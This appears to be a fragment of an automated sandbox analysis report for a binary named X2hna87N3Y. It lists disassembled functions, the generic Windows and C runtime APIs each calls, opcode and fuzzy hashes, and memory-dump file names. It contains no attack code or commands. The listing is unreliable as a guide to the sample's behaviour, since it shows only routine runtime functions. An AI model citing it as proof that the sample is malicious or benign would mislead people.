                                                                                                                  • Instruction ID: 5d2e06aff7418538b31cabcf21c2b7033203aba761094ced71b8820f7877d8c0
                                                                                                                  • Opcode Fuzzy Hash: 5c5a3cdfbb4f6886e64de4527dd19e818f089e5f6e6114349e5d41dd9d58ffc4
                                                                                                                  • Instruction Fuzzy Hash: 5021B6B0905308DFDB44EFA8E58979EBBF0FB48300F50892AE44AD7354E77499489F66
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00DA7345,000000FF,?,00D9145E,00D91345,?,00D914FA,00000000), ref: 00D913D2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D913E4
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DA7345,000000FF,?,00D9145E,00D91345,?,00D914FA,00000000), ref: 00D91406
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction ID: d256b81d1e4b8afddf0bfd19b2d51447c9fc1503f627552f2d7acdb6e67df790
                                                                                                                  • Opcode Fuzzy Hash: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction Fuzzy Hash: D0016735A4461AEFDF159F54CC09FAFBBB8FB44B11F044629E821E2790DB749900CA60
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98BBB
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98C84
                                                                                                                  • __freea.LIBCMT ref: 00D98CEB
                                                                                                                    • Part of subcall function 00D97381: HeapAlloc.KERNEL32(00000000,?,?,?,00D88E50,?,?,00D821C2,00001000,?,00D8210A), ref: 00D973B3
                                                                                                                  • __freea.LIBCMT ref: 00D98CFE
                                                                                                                  • __freea.LIBCMT ref: 00D98D0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1096550386-0
                                                                                                                  • Opcode ID: 9baf3e48ae8b97a8198f8d5bb7064e6a8c78925ca85400659604db514eddfbd5
                                                                                                                  • Instruction ID: 054fac9b009c71e15bc6ef15feee8a238d2110df2e5fdbb6940fb179d5576821
                                                                                                                  • Opcode Fuzzy Hash: 9baf3e48ae8b97a8198f8d5bb7064e6a8c78925ca85400659604db514eddfbd5
                                                                                                                  • Instruction Fuzzy Hash: 3351BFB2601246AFEF216F65CC81EBB7AA9EF96B10F190129FD05E6151EF30DD10A770
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3849164406-0
                                                                                                                  • Opcode ID: b4da3247686a4ea24307aef47fef77df224a25c53c3484fe273df1dad5d18e93
                                                                                                                  • Instruction ID: d36972b7b1b45452316c96974dc5d16a88178b67316fb41438f00e4ea8c49c43
                                                                                                                  • Opcode Fuzzy Hash: b4da3247686a4ea24307aef47fef77df224a25c53c3484fe273df1dad5d18e93
                                                                                                                  • Instruction Fuzzy Hash: F4719DB4D04648CFDB10EFA8D588B9DBBF0BF48314F508529E499AB345D734A949CF62
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8BB1B
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB3A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB68
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBC3
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBDA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: 72d9beab925a8e3014d9044b3d5e3ca21e842fc8886a68301225fb7be935f00a
                                                                                                                  • Instruction ID: 4a2b629674e56c22525ee5005967baaa2467f76b1821862f02a7dc57c9a7283e
                                                                                                                  • Opcode Fuzzy Hash: 72d9beab925a8e3014d9044b3d5e3ca21e842fc8886a68301225fb7be935f00a
                                                                                                                  • Instruction Fuzzy Hash: 3341277590060ADFCB20EF65C4909AAB3F4FF08360B584A6BE496D7654DB30F985CB71
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D894C6
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D894D1
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8953F
                                                                                                                    • Part of subcall function 00D893C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D893E0
                                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D894EC
                                                                                                                  • _Yarn.LIBCPMT ref: 00D89502
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1088826258-0
                                                                                                                  • Opcode ID: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction ID: 36927654b3212abf823048b1a7bafe2152779ea13c336f6bb57befb803698d3c
                                                                                                                  • Opcode Fuzzy Hash: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction Fuzzy Hash: 0A01BC75A00211EBC706FB20D86957DBBA1FF85320B184149E84197381DF34AA42CBB1
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC), ref: 00DA1BBE
                                                                                                                  • GetLastError.KERNEL32(?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC,00000000,?,00D9702C), ref: 00DA1BC8
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA1BF0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  • Opcode ID: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
                                                                                                                  • Instruction ID: f9bba14c2eb3cfcfd0144484d5e21db8f5e8298557f979501139dbe6055c02c1
                                                                                                                  • Opcode Fuzzy Hash: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
                                                                                                                  • Instruction Fuzzy Hash: 54E04F30685309FBFF102B61EC06F5E3F58AB12B91F184021F90DE81E2EB61D9509AB4
                                                                                                                  APIs
                                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D9F36C
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D9F5BE
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D9F604
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9F6A7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  • Opcode ID: 3e993a70e924f527f98456c6c58face802228d08a03908e8db4fc86ea1170ff2
                                                                                                                  • Instruction ID: 269be6e52615b882b0cc585c6779064c4fca898b6571cebe82f407c471ac4a71
                                                                                                                  • Opcode Fuzzy Hash: 3e993a70e924f527f98456c6c58face802228d08a03908e8db4fc86ea1170ff2
                                                                                                                  • Instruction Fuzzy Hash: 2BD14975D00258EFCF15CFA8D8809AEBBB5FF49314F28456AE865EB352D630E941CB60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: 090b6f0b512c26b8808fc8293638a69c18d12611ba49fac5e84e43d6be5eede8
                                                                                                                  • Instruction ID: e59d74052eaf4aeb701b44971657424896e7ff8f4fd31a6f9b6ad292b521f51e
                                                                                                                  • Opcode Fuzzy Hash: 090b6f0b512c26b8808fc8293638a69c18d12611ba49fac5e84e43d6be5eede8
                                                                                                                  • Instruction Fuzzy Hash: 4051BF76A00206EFEF299F91D851BBAB7A4EF04B14F18452DE845876D1E731EC80CBB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9D199
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9D1A0
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9D1DA
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9D1E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  • Opcode ID: 233db2b963efd57eeca43dfa7019cbd5fcf5551749c590d566727f98447ff958
                                                                                                                  • Instruction ID: d1a7083fa3184a81d9d215e3fbb70d616e0f750529b803e911f2b4275ebaa60e
                                                                                                                  • Opcode Fuzzy Hash: 233db2b963efd57eeca43dfa7019cbd5fcf5551749c590d566727f98447ff958
                                                                                                                  • Instruction Fuzzy Hash: 6B219F72700305AFDF21AF6A8C8096BB7AAFF443A47148519F959A7251DB30ED40CBB0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6632d0c43cc60cfa8f6adc5de762a7216655ea3068becb9dbdaf4aebe82fede
                                                                                                                  • Instruction ID: 3ba9842fda5c4324ca8e6db3d3e04f64bba3ea26611249405f069a5415012712
                                                                                                                  • Opcode Fuzzy Hash: d6632d0c43cc60cfa8f6adc5de762a7216655ea3068becb9dbdaf4aebe82fede
                                                                                                                  • Instruction Fuzzy Hash: 3321A931604215BF9B28FF658C8096BB7A9FF40B647198A25F85AD7251EB30ED019FB0
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D9E533
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E56B
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E58B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 158306478-0
                                                                                                                  • Opcode ID: 54c35c0a5dcb941cf8583139c07fcebf67147abd9effc8346e8212600717bf9d
                                                                                                                  • Instruction ID: a062ab5a912473d4fac1d0ceaf684ad244b34322521b02687160583ff79f9581
                                                                                                                  • Opcode Fuzzy Hash: 54c35c0a5dcb941cf8583139c07fcebf67147abd9effc8346e8212600717bf9d
                                                                                                                  • Instruction Fuzzy Hash: 8311C0F5A15215FE6F6177B6AC89CBF6FACCF843A83150128F841D1201FA20DF0192B1
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D816BD
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D816CB
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D816E4
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D81723
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2261580123-0
                                                                                                                  • Opcode ID: d6323db2f485d630e4feb223ad0b5b2731263442b290d4ab544adcec5536a877
                                                                                                                  • Instruction ID: acabde55f8244096f8cb4f37f7a538f2973f3381ccc1db1300655912b092cdb3
                                                                                                                  • Opcode Fuzzy Hash: d6323db2f485d630e4feb223ad0b5b2731263442b290d4ab544adcec5536a877
                                                                                                                  • Instruction Fuzzy Hash: EE21D3B4E04209CFDB08EFA8D5926AEFBF5EF48300F05845DE889A7351DB399941CB61
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D8AA68
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8AA72
                                                                                                                    • Part of subcall function 00D84080: std::_Lockit::_Lockit.LIBCPMT ref: 00D840AE
                                                                                                                    • Part of subcall function 00D84080: std::_Lockit::~_Lockit.LIBCPMT ref: 00D840D9
                                                                                                                  • codecvt.LIBCPMT ref: 00D8AAAC
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8AAE3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3716348337-0
                                                                                                                  • Opcode ID: 21ffaabe07afb4926a25e34ba41d4919728605c1086803f18af94245b3fbb3e7
                                                                                                                  • Instruction ID: dca86890ad292cee8853a663e44467a35fda09e86b1319434b1a72bb4c1c1822
                                                                                                                  • Opcode Fuzzy Hash: 21ffaabe07afb4926a25e34ba41d4919728605c1086803f18af94245b3fbb3e7
                                                                                                                  • Instruction Fuzzy Hash: 1B01C0B1900216DBCB09FB68D9596BEB7B5EF80320F29410AE811A7391DF749E00CBB1
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000), ref: 00DA6077
                                                                                                                  • GetLastError.KERNEL32(?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?,?,00D9F041,00000000), ref: 00DA6083
                                                                                                                    • Part of subcall function 00DA60D4: CloseHandle.KERNEL32(FFFFFFFE,00DA6093,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?), ref: 00DA60E4
                                                                                                                  • ___initconout.LIBCMT ref: 00DA6093
                                                                                                                    • Part of subcall function 00DA60B5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DA6051,00DA553C,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60C8
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
